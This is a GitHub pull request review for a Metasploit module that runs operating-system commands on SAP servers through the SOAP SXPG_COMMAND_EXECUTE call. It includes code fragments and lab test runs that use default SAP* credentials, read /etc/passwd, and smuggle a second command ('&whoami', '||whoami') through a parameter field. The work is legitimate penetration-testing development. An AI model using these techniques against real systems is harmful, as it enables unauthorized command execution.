Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

SAP SOAP RFC SXPG_COMMAND_EXECUTE #1037

Merged
merged 3 commits into from Nov 19, 2012

Conversation

Projects
None yet
4 participants
Contributor

nmonkee commented Nov 7, 2012

This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+ 'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
+ 'License' => BSD_LICENSE
+ )
+ register_options(
+ [
+ OptString.new('CLIENT', [true, 'Client', nil]),
+ OptString.new('USERNAME', [true, 'Username', nil]),
+ OptString.new('PASSWORD', [true, 'Password', nil]),
+ OptString.new('CMD', [true, 'Command to be executed', nil]),
+ OptString.new('PARAM', [false, 'Additional parameters', nil]),
+ OptEnum.new('OS', [true, 'Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']]),
@brandonprry

brandonprry Nov 9, 2012

Contributor

Trailing comma

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ data << '</n1:SXPG_COMMAND_EXECUTE>'
+ data << '</env:Body>'
+ data << '</env:Envelope>'
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
@brandonprry

brandonprry Nov 9, 2012

Contributor

Trailing comma

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
+ }
+ }, 45)
+ if (res and res.code != 500 and res.code != 200)
@brandonprry

brandonprry Nov 9, 2012

Contributor

if res and res.code != 500 and res.code != 200

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ )
+ response = res.body
+ if response =~ /faultstring/
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
+ print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+ return
+ end
+ if success == true
@brandonprry

brandonprry Nov 9, 2012

Contributor

if success

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
+ print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+ return
+ end
+ if success == true
+ print(saptbl.to_s)
+ end
+ if sucess == false
@brandonprry

brandonprry Nov 9, 2012

Contributor

You have two options here.

Since success is boolean, it has only two values, and a simple else should suffice instead of re-evaluating success (which is also a typo).

However, since this is assumes success is boolean, being explicit could be appropriate with and elsif !success

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
+ print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+ return
+ end
+ if success == true
+ print(saptbl.to_s)
+ end
+ if sucess == false
+ for i in 0..error.length-1
@brandonprry

brandonprry Nov 9, 2012

Contributor

0.upto(error.length-1) do |i|

Contributor

jvazquez-r7 commented Nov 14, 2012

msftidy warnings should be fixed:

$ tools/msftidy.rb modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb 
sap_soap_rfc_sxpg_command_exec.rb:9 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:10 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:12 - [ERROR] Unicode detected: "# Mariano Nu\xC3\xB1ez (the author of the Bizploit framework) helped me in my efforts\n"
sap_soap_rfc_sxpg_command_exec.rb:14 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:15 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:48 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:119 - [WARNING] Spaces at EOL

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
+ 'Version' => '$Revision',
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

Version field isn't needed anymore

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

Please avoid the use of more than 100 columns lines in the description field.

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

Only references to the specific technique used in the module, pls.

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
+ 'Version' => '$Revision',
+ 'Description' => %q{
+ This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+ 'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
+ 'License' => BSD_LICENSE
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

Can MSF_LICENSE be used?

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ 'Prefix' => "\n",
+ 'Postfix' => "\n",
+ 'Indent' => 1,
+ 'Columns' =>["Output",]
+ )
+ response = res.body
+ if response =~ /faultstring/
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
+ saptbl << [output[i]]
+ end
+ end
+ rescue ::Rex::ConnectionError
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

Indentation for this rescue should be fixed.

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012

...xiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+ if (res and res.code != 500 and res.code != 200)
+ # to do - implement error handlers for each status code, 404, 301, etc.
+ print_error("[SAP] #{ip}:#{rport} - something went wrong!")
+ return
+ else
+ success = true
+ print_status("[SAP] #{ip}:#{rport} - got response")
+ saptbl = Msf::Ui::Console::Table.new(
+ Msf::Ui::Console::Table::Style::Default,
+ 'Header' => "[SAP] SXPG_COMMAND_EXECUTE ",
+ 'Prefix' => "\n",
+ 'Postfix' => "\n",
+ 'Indent' => 1,
+ 'Columns' =>["Output",]
+ )
+ response = res.body
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

I think res should be check against nil before using it here.

Contributor

jvazquez-r7 commented Nov 14, 2012

If you're able to execute OS commands it could be converted to an exploit.

Contributor

jvazquez-r7 commented Nov 18, 2012

No luck running it:

  • First try:
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > show options
Module options (auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       Client
   CMD       ENV              yes       Command to be executed
   OS        Windows NT       yes       Target OS (accepted: ANYOS, UNIX, Windows NT, AS/400, OS/400)
   PARAM                      no        Additional parameters
   PASSWORD  admin1234        yes       Password
   Proxies                    no        Use a proxy chain
   RHOSTS    192.168.1.160    yes       The target address range or CIDR identifier
   RPORT     8000             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > run
[*] [SAP] 192.168.1.160:8000 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] [SAP] 192.168.1.160:8000 - got response
[-] Auxiliary failed: NoMethodError undefined method `scan' for nil:NilClass
[-] Call stack:
[-]   /Users/juan/Projects/metasploit-framework/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb:101:in `run_host'
[-]   /Users/juan/Projects/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:94:in `block in run'
[-]   /Users/juan/Projects/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `call'
[-]   /Users/juan/Projects/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[*] Auxiliary module execution completed

I can solve the exception by myself when doing the last clenaup, but trying to put a bigger timeout for send_request_raw:

            res = send_request_raw({
                'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
                'method' => 'POST',
                'data' => data,
                'headers' =>{
                    'Content-Length' => data.size.to_s,
                    'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
                    'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
                    'Authorization' => 'Basic ' + user_pass,
                    'Content-Type' => 'text/xml; charset=UTF-8'
                    }
                }, 100)

I just get:

msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > run
[*] [SAP] 192.168.1.160:8000 - sending SOAP SXPG_COMMAND_EXECUTE request
^[[B[*] [SAP] 192.168.1.160:8000 - got response
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Inspecting the response, it's a HTTP 500:

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body><SOAP-ENV:Fault><faultcode> SOAP-ENV:Client </faultcode><faultstring> Internal Server Error </faultstring><detail><rfc:Error xmlns:rfc="urn:sap-com:document:sap:soap:functions"><type>TH_RES_FREE</type><message>Work process restarted; session terminated                               </message></rfc:Error></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>

I've checked which the ENV cmd exists in the SM69 transaction.

Maybe SAP needs any additional configuration.. Am I forgetting something?

Contributor

nmonkee commented Nov 18, 2012

In SM69 does the command ENV exist?

Aren't you running on Linux?

Try:

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001
CMD=LIST_DB2DUMP OS=2 PARAM="/etc/passwd" E
[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: LIST_DB2DUMP /etc/passwd

[SAP] Command Exec

Output

r-- 1 root root 1669 2011-11-02 12:58 /etc/passwd

-rw-r-

[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed

Contributor

nmonkee commented Nov 18, 2012

An example run for all RFC modules can be found here: http://labs.mwrinfosecurity.com/blog/2012/04/27/mwr-sap-metasploit-modules

The SOAP modules are all the same.

Contributor

jvazquez-r7 commented Nov 18, 2012

In SM69 does the command ENV exist?

  • Yes

Aren't you running on Linux?

  • No, windows finally

(Yes, I'd checked http://labs.mwrinfosecurity.com/blog/2012/04/27/mwr-sap-metasploit-modules , thanks for pointing :))

Contributor

nmonkee commented Nov 18, 2012

Curious. Can you try list_db2dump?

Can you try ENV with additional PRAM of & whoami

Contributor

jvazquez-r7 commented Nov 18, 2012

Can you try list_db2dump?

  • sure, result (with a dump of the response got):
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > show options
Module options (auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       Client
   CMD       LIST_DB2DUMP     yes       Command to be executed
   OS        Windows NT       yes       Target OS (accepted: ANYOS, UNIX, Windows NT, AS/400, OS/400)
   PARAM                      no        Additional parameters
   PASSWORD  admin1234        yes       Password
   Proxies                    no        Use a proxy chain
   RHOSTS    192.168.1.160    yes       The target address range or CIDR identifier
   RPORT     8000             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > run
[*] [SAP] 192.168.1.160:8000 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] [SAP] 192.168.1.160:8000 - got response
[*] 500
  SOAP-ENV:Client  Internal Server Error TH_RES_FREEWork process restarted; session terminated                               
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Can you try ENV with additional PRAM of & whoami

  • sure, result:
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > set CMD ENV
CMD => ENV
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > set PARAM & whoami
PARAM => & whoami
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > show options
Module options (auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       Client
   CMD       ENV              yes       Command to be executed
   OS        Windows NT       yes       Target OS (accepted: ANYOS, UNIX, Windows NT, AS/400, OS/400)
   PARAM     & whoami         no        Additional parameters
   PASSWORD  admin1234        yes       Password
   Proxies                    no        Use a proxy chain
   RHOSTS    192.168.1.160    yes       The target address range or CIDR identifier
   RPORT     8000             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host
msf  auxiliary(sap_soap_rfc_sxpg_command_exec) > run
[*] [SAP] 192.168.1.160:8000 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] [SAP] 192.168.1.160:8000 - got response
[*] 500
  SOAP-ENV:Client  Internal Server Error RABAX_STATEAn error occurred during the receipt of a complex parameter.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

(in both tests timeout of send_request_raw is 100)

Contributor

nmonkee commented Nov 19, 2012

o.k I'll have to fire up my VM and test tomorrow. I'll get back to you. Can you exec those manually via the gui in sm69/sm49?

Contributor

jvazquez-r7 commented Nov 19, 2012

yup, same error message when running a command from the SM69 transaction:

Work process restarted; session terminated

Did you find it before? Or maybe is related to something wrong in my SAP installation?

Contributor

nmonkee commented Nov 19, 2012

Sounds like a SAP set up issue. I'll look into it.

Contributor

jvazquez-r7 commented Nov 19, 2012

Really thanks!

Contributor

nmonkee commented Nov 19, 2012

msf auxiliary(sap_soap_rfc_sxpg_command_exec) > show options

Module options (auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec):

Name Current Setting Required Description


CLIENT 000 yes Client
CMD LIST_DB2DUMP yes Command to be executed
OS Windows NT yes Target OS (accepted: ANYOS, UNIX, Windows NT, AS/400, OS/400)
PARAM c:\ no Additional parameters
PASSWORD 06071992 yes Password
Proxies no Use a proxy chain
RHOSTS 10.0.7.27 yes The target address range or CIDR identifier
RPORT 8000 yes The target port
THREADS 1 yes The number of concurrent threads
USERNAME SAP* yes Username
VHOST no HTTP server virtual host

msf auxiliary(sap_soap_rfc_sxpg_command_exec) > run

[] [SAP] 10.0.7.27:8000 - sending SOAP SXPG_COMMAND_EXECUTE request
[
] [SAP] 10.0.7.27:8000 - got response

[SAP] SXPG_COMMAND_EXECUTE

Output


              3 File(s)         10,156 bytes
              7 Dir(s)  17,175,728,128 bytes free
Directory of c:\
Volume Serial Number is 6450-5096
Volume in drive C has no label.

04/10/2012 09:07 PM <DIR> Users
05/21/2011 12:13 AM 1,830 unattend.xml
05/22/2011 09:04 PM <DIR> sqlinstall
05/22/2011 10:02 PM 176 completesql.cmd
05/23/2011 01:23 AM 8,150 sqlcompleteconfig.ini
07/14/2009 03:20 AM <DIR> PerfLogs
08/16/2012 07:39 PM <DIR> Program Files
08/22/2012 09:33 AM <DIR> Windows
09/08/2012 10:26 PM <DIR> AAA
10/28/2011 08:29 AM <DIR> Program Files (x86)

[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed

Contributor

nmonkee commented Nov 19, 2012

I do think there is an issue with sending the ampersand (&) though.

msf auxiliary(sap_soap_rfc_sxpg_command_exec) > set PARAM "C:\windows\win.ini&whoami"
PARAM => C:\windows\win.ini&whoami
msf auxiliary(sap_soap_rfc_sxpg_command_exec) > run

[_] [SAP] 10.0.7.27:8000 - sending SOAP SXPG_COMMAND_EXECUTE request

env:BodyC:\windows\win.ini&whoami DISPLAY_DIAGLOGWindows NT/n1:SXPG_COMMAND_EXECUTE/env:Body/env:Envelope[*] [SAP] 10.0.7.27:8000 - got response

[_] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

set PARAM "C:\windows\win.ini||whoami"
PARAM => C:\windows\win.ini||whoami
msf auxiliary(sap_soap_rfc_sxpg_command_exec) > run

[*] [SAP] 10.0.7.27:8000 - sending SOAP SXPG_COMMAND_EXECUTE request

env:BodyC:\windows\win.ini||whoami DISPLAY_DIAGLOGWindows NT/n1:SXPG_COMMAND_EXECUTE/env:Body/env:Envelope[*] [SAP] 10.0.7.27:8000 - got response

[SAP] SXPG_COMMAND_EXECUTE

Output


; for 16-bit app support
MAPI=1
[Mail]
[extensions]
[files]
[fonts]
[mci extensions]

[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed

Contributor

nmonkee commented Nov 19, 2012

Must enter ampersand as &

msf auxiliary(sap_soap_rfc_sxpg_command_exec) > show options

Module options (auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec):

Name Current Setting Required Description


CLIENT 000 yes Client
CMD DISPLAY_DIAGLOG yes Command to be executed
OS Windows NT yes Target OS (accepted: ANYOS, UNIX, Windows NT, AS/400, OS/400)
PARAM &whoami no Additional parameters
PASSWORD 06071992 yes Password
Proxies no Use a proxy chain
RHOSTS 10.0.7.27 yes The target address range or CIDR identifier
RPORT 8000 yes The target port
THREADS 1 yes The number of concurrent threads
USERNAME SAP* yes Username
VHOST no HTTP server virtual host

msf auxiliary(sap_soap_rfc_sxpg_command_exec) > run

[] [SAP] 10.0.7.27:8000 - sending SOAP SXPG_COMMAND_EXECUTE request
[
] [SAP] 10.0.7.27:8000 - got response

[SAP] SXPG_COMMAND_EXECUTE

Output


The syntax of the command is incorrect.
gateway\administrator

[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed

Contributor

nmonkee commented Nov 19, 2012

Have you licensed the server?

Contributor

jvazquez-r7 commented Nov 19, 2012

It's using the installation temporal license, should it be a problem?

Contributor

nmonkee commented Nov 19, 2012

iirc, I had to request a licence. So long ago now though.

Bit if you log in via the GUI into client 001 or 066 as SAP* you should get an error about licence iirc. If you don't get that then thats not the issue.

Try against client 000 as SAP*?

As SAP* you shouldn't have any issue in SM49 or SM69 from executing any of the commands there.

Contributor

jvazquez-r7 commented Nov 19, 2012

Hi nmonkee, With the hope of accelerate things, I've done the next pull request to your repo and branch:

nmonkee#1

If you could test it in your installation (if you have windows/linux would be awesome) and send network capture to juan.vazquez [at] metasploit.com , and update this Pull request with msfconsole output, I'll feel confident to merge it :)

If after testing my changes, it's working please land it, so this pull request will be automatically updated and we'll be able to merge it ! :)

I hope you don't go annoyed, feel free to ask me if there is any doubt about the procedure!

Thanks in advance!

juan

Contributor

nmonkee commented Nov 19, 2012

No worries, I'm fighting with vmnet-sniffer on OS X. PITA it is.

On 19 Nov 2012, at 17:08, Juan Vazquez notifications@github.com wrote:

Hi nmonkee, With the hope of accelerate things, I've done the next pull request to your repo and branch:

nmonkee#1

If you could test it in your installation (if you have windows/linux would be awesome) and send network capture to juan.vazquez [at] metasploit.com , and update this Pull request with msfconsole output, I'll feel confident to merge it :)

If after testing my changes, it's working please land it, so this pull request will be automatically updated and we'll be able to merge it ! :)

I hope you don't go annoyed, feel free to ask me if there is any doubt about the procedure!

Thanks in advance!

juan


Reply to this email directly or view it on GitHub.

Contributor

nmonkee commented Nov 19, 2012

how do I get the pcap's to you?

Contributor

jvazquez-r7 commented Nov 19, 2012

nmonkee: you can email me or just send them via git is right heh :) awesome! will be checking asap! really thanks!

Contributor

jvazquez-r7 commented Nov 19, 2012

Awesome, nmonkee pcap's look good, merging!

nmonkee: there are two more modules related to command execution, which I think am going to have the same issue, do you agree to use the same approach that this pull request? (I do cleanup, do pull request to your repo, you test, if works you can land pull request, send pcaps and I do the final merge)

@jvazquez-r7 jvazquez-r7 merged commit dcb5cfd into rapid7:master Nov 19, 2012

1 check passed

default The Travis build passed
Details
Contributor

nmonkee commented Nov 19, 2012

No problem.

On 19 Nov 2012, at 21:45, Juan Vazquez notifications@github.com wrote:

Awesome, nmonkee pcap's look good, merging!

nmonkee: there are two more modules related to command execution, which I think am going to have the same issue, do you agree to use the same approach that this pull request? (I do cleanup, do pull request to your repo, you test, if works you can land pull request, send pcaps and I do the final merge)


Reply to this email directly or view it on GitHub.

Coverage Status

Changes Unknown when pulling dcb5cfd on nmonkee:sap_soap_rfc_sxpg_command_exec into * on rapid7:master*.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment